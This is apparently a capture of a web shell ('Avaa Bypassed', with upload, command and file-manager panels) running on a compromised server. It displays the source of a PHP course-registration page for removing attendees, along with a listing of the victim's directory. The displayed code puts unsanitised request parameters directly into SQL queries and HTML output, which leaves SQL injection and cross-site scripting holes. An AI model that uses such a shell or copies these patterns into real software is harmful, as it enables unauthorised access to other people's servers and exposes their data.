[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@18.188.92.6: ~ $ 
<?php
	include_once("config.php"); //holds global config variables
	include_once("common_functions.php"); //include some common functions
	require_once($_SERVER['DOCUMENT_ROOT'] . "/phplist/config/config.php"); //phplist config values                
 	check_if_authenticated('admin');//check if user is logged in
	$db = mysqli_connect($mysql_server, $user, $pass, $database);

	if(isset($_POST['cancel']) && ($_POST['cancel'] == "No")){
		if(is_admin_logged_in()){
			header("location:list_attendees.php?session_id=".$_POST['session_id']);
			exit;
		}else{
			header("location:/course_registration/user_course_list.php");
			exit;
		}
	}
	
	if(is_admin_logged_in()){ //if user is logged in, format page accordingly
		$page_title = "Remove Attendee | CES Admin";
		include_once("admin_html_top.php"); //get the HTML heading common to all pages in the CES admin module
		echo "<article class='ces-admin'>
        		<h2>CES Admin - Remove Attendee</h2>";
        include_once("ces_admin_nav.php");
	}//if
	else{
		$page_title = "Unregister";
		include("public_top.php"); //the HTML that outlines the top of the page for a user's view
		echo "<article>
        		<h2>Unregister From Session</h2>";
	}//else

	if(isset($_POST['remove_attendee'])){
		if(remove_attendee($_POST['session_id'], $_POST['id'], $_POST['location_id'])){
			if(is_admin_logged_in()){
				echo "\n<p class='alert alert-success'>Success - $_POST[first_name] $_POST[last_name] has been removed from the session.</p>";
				echo "\n<a class='btn btn-lg ces-green-btn' href='list_attendees.php?session_id=".$_POST['session_id']."'>Session Attendees List</a>";
				echo "\n<a class='btn btn-lg ces-orange-btn' href='user_admin_course_list.php?id=".$_POST['id']."'>User's Course List</a>";
			}else{
				echo "\n<p class='alert alert-success'>Success - You have been removed from the session.</p>";
				echo "\n<a class='btn btn-lg ces-green-btn' href='/sessions/current/'>Current Sessions</a>";
				echo "\n<a class='btn btn-lg ces-blue-btn' href='user_course_list.php'>Your Courses</a>";
			}
		}else{
			print_sql_error('Error - could not remove attendee from the session when trying to do:', $delete_sql);
		}//else
	}
	else { //if form has not been submitted yet ask user to confirm that they really want to remove attendee from session
		echo "\n<form method='post' action='" . $_SERVER['PHP_SELF'] . "''>";
		echo "<input type='hidden' name='session_id' value='" . $_GET['session_id'] . "''>"; //so we can keep track of the session_id
		echo "<input type='hidden' name='id' value='" . $_GET['id'] . "''>"; //so we can keep track of the person
		echo "<input type='hidden' name='location_id' value='" . $_GET['location_id'] . "''>"; //so we can keep track of the location

		//get some details about the attendee we are removing
		$attendee_sql = mysqli_query($db, "SELECT first_name.value as first_name, last_name.value as last_name, user.email
		FROM phplist_user_user user
		LEFT OUTER JOIN phplist_user_user_attribute first_name ON user.id = first_name.userid AND first_name.attributeid = '1'
		LEFT OUTER JOIN phplist_user_user_attribute last_name ON user.id = last_name.userid AND last_name.attributeid = '2'
		WHERE user.id = '$_GET[id]'");
		$attendee = mysqli_fetch_row($attendee_sql);
		
		echo "<input type='hidden' name='first_name' value='" . $attendee[0] . "''>"; //so we can use the person's first name once form is submitted
		echo "<input type='hidden' name='last_name' value='" . $attendee[1] . "''>"; //so we can use the person's last name once form is submitted
		echo "<input type='hidden' name='user_type' value='" . $_GET['user_type'] . "''>"; //so we can keep track of if a user or admin is logged in
		
		//get the course details so we can show which session the attendee will be removed from for confirmation
		$session_sql = mysqli_query($db, "SELECT session.session_id, course.course_id, course.course_name, course.course_description, unix_timestamp(session.start_dt) start_dt, unix_timestamp(session.end_dt) end_dt, location.location_name, location.address_line1, location.address_line2, location.city, location.province, location.postal_code, level.level_description
		FROM ces_sessions session 
		LEFT OUTER JOIN ces_courses course ON session.course_id = course.course_id 
		LEFT OUTER JOIN ces_locations location ON location.location_id = '$_GET[location_id]'
		LEFT OUTER JOIN ces_levels level ON level.level_id = course.level_id
		WHERE session.session_id = '$_GET[session_id]'");
		
		while ($session_query = mysqli_fetch_array($session_sql)){
	?>

	<?php 
		if(is_admin_logged_in()){
			echo "<p class='ces-confrim-removal'>Are you sure you want to remove <strong>". $attendee[0] . " " . $attendee[1]."</strong> from this session?</p>";
		}
		else{
			echo "<p class='ces-confrim-removal'><strong>".$attendee[0]."</strong>, are you sure you want to be removed from this session?</p>";
		}
	?>	
			<dl class='ces-description-list'>
				<dt>Course:</dt>
				<dd><?php echo $session_query['course_name']; ?></dd>

			<dt>Date:</dt>
		<?php
			if (date('Ymd', $session_query['start_dt']) == date('Ymd', $session_query['end_dt'])){
				//starts and ends on the same day
				echo "<dd class='ces-registration-time'>". date('F j, Y g:i A', $session_query['start_dt']). " to " . date('g:i A', $session_query['end_dt']) . "</dd>";
			}
			else{
				echo "<dd class='ces-registration-time'>". date('F j, Y g:i A', $session_query['start_dt']). " to " . date('F j, Y g:i A', $session_query['end_dt']) . "</dd>";
			}
		?>

			<dt>Description:</dt>
			<dd><?php echo ($session_query['course_description']?$session_query['course_description']: 'None'); ?></dd>

			<dt>Level:</dt>
			<dd><?php echo ($session_query['level_description']? $session_query['level_description']: 'None'); ?></dd>
			<?php if(!is_session_online($session_query['session_id'])){?>
			<dt>Location:</dt>
			<dd>
				<?php 
					//2011-05-28 - wsopko - output session name as map link
					//echo $session_query['location_name'];
					echo $session_query['location_name'];
					if (strlen($session_query['address_line1']) > 0)
						echo "\n<br>" . $session_query['address_line1'];
					if (strlen($session_query['address_line2']) > 0)
						echo "\n<br>" . $session_query['address_line2'];
					if (strlen($session_query['city']) > 0)
						echo "\n<br>" . $session_query['city'];
					if (strlen($session_query['province']) > 0)
						echo ", " . $session_query['province'];
					if (strlen($session_query['postal_code']) > 0)
						echo "\n<br>" . substr($session_query['postal_code'], 0, 3). " " . substr($session_query['postal_code'], 3, 3);
				?>
			</dd>
			<?php } ?>
			</dl>
	
	<div class="ces-remove-attendee-page-btns">
		<input class="btn btn-lg btn-block ces-green-btn" type='submit' name='remove_attendee' value="Yes">
		<input class="btn btn-lg btn-block ces-red-btn" type='submit' name='cancel' value="No">
	</div>	
	<?php 
		}//while	
	?>	
			</form>
	<?php 
	}//else
	
	if(is_admin_logged_in()){ //if user is logged in, format page accordingly
		include_once("admin_html_bottom.php"); //get the bottom HTML common to all pages in the CES module
	}else{
		include_once("public_bottom.php"); //get the bottom HTML common to all pages in the CES module
	}
?>

Filemanager

DIR : / home/ hmhc3928/ public_html_community/ php/
Name Type Size Permission Actions
check_login.php File 2.56 KB 0644
common_functions.php File 69.94 KB 0644
config.php File 1.01 KB 0644
course_registration.php File 18.01 KB 0644
error_log File 110.84 KB 0644
remove_attendee.php File 7.08 KB 0644
top.php File 989 B 0644